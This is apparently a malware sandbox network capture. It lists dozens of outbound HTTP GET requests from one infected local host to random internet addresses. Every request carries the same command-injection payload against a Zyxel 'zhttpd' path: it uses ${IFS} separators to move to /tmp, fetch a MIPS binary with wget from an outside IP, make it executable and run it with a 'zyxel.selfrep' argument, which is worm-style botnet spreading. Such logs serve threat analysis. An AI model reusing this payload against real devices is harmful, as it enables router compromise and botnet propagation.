                                                        Feb 2, 2024 06:21:07.891633987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4043192.168.2.1435864167.191.89.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891679049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4044192.168.2.144995060.64.233.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891720057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4045192.168.2.144226864.166.114.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891752005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4046192.168.2.144100265.152.240.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891792059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4047192.168.2.145098886.136.189.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891825914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4048192.168.2.1451546199.38.207.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891886950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4049192.168.2.144141424.161.167.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891910076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4050192.168.2.146094231.164.98.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891971111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4051192.168.2.145004845.213.47.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891993999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4052192.168.2.145981239.187.208.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892026901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4053192.168.2.143696085.6.94.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892052889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4054192.168.2.1448360102.192.248.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892088890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4055192.168.2.1434508180.0.212.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892138004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4056192.168.2.145995040.228.91.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892190933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4057192.168.2.143459092.31.24.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892219067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4058192.168.2.1451814181.108.178.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892260075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4059192.168.2.146034275.122.233.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892317057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4060192.168.2.1442726135.49.15.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892354965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4061192.168.2.143717895.214.6.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892388105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4062192.168.2.1444254188.153.234.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892429113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4063192.168.2.145864053.86.164.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892462969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4064192.168.2.145762269.45.101.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892512083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4065192.168.2.1453856157.109.216.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892539978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4066192.168.2.1433422218.116.2.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892575979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4067192.168.2.145370027.36.209.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.892625093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4068192.168.2.1435412172.141.204.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.901891947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4069192.168.2.1450548117.234.86.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.901922941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4070192.168.2.144311881.99.249.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902122974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4071192.168.2.1442458182.70.183.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902160883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4072192.168.2.1443202160.141.13.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902196884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4073192.168.2.1460652106.131.122.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902230024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4074192.168.2.144539637.83.227.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902268887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4075192.168.2.1456362191.253.108.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902323961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4076192.168.2.144064482.57.65.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902359009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4077192.168.2.1457266153.237.237.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902399063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4078192.168.2.1456402132.29.142.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902457952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4079192.168.2.1451994146.167.19.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902499914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4080192.168.2.1438242191.20.193.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902548075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4081192.168.2.14399369.79.84.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902591944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4082192.168.2.144080071.0.168.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902648926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4083192.168.2.145764034.134.7.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902686119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4084192.168.2.145341069.165.4.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902738094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4085192.168.2.144605634.193.228.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902761936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4086192.168.2.1445896161.233.176.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902797937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4087192.168.2.1445240145.109.222.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902842999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4088192.168.2.145088879.202.241.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902867079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4089192.168.2.144995664.46.10.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902899027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4090192.168.2.1434030103.221.16.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.902970076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4091192.168.2.145448094.199.87.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903002024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4092192.168.2.143506675.4.111.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903033972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4093192.168.2.1452174201.44.86.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903079987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4094192.168.2.145061212.192.188.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903109074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4095192.168.2.1440114114.31.60.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903139114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4096192.168.2.145684881.33.59.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903196096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4097192.168.2.1442034209.119.71.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903201103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4098192.168.2.1435784176.192.164.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903250933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4099192.168.2.1458760199.11.229.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903301001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4100192.168.2.143845220.137.130.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903347015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4101192.168.2.14397262.160.137.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903362989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4102192.168.2.145212890.107.78.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903395891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4103192.168.2.145690859.73.223.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903446913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4104192.168.2.1445634211.106.92.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903492928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4105192.168.2.145476096.89.72.123443
                                                        TimestampBytes transferredDirectionData
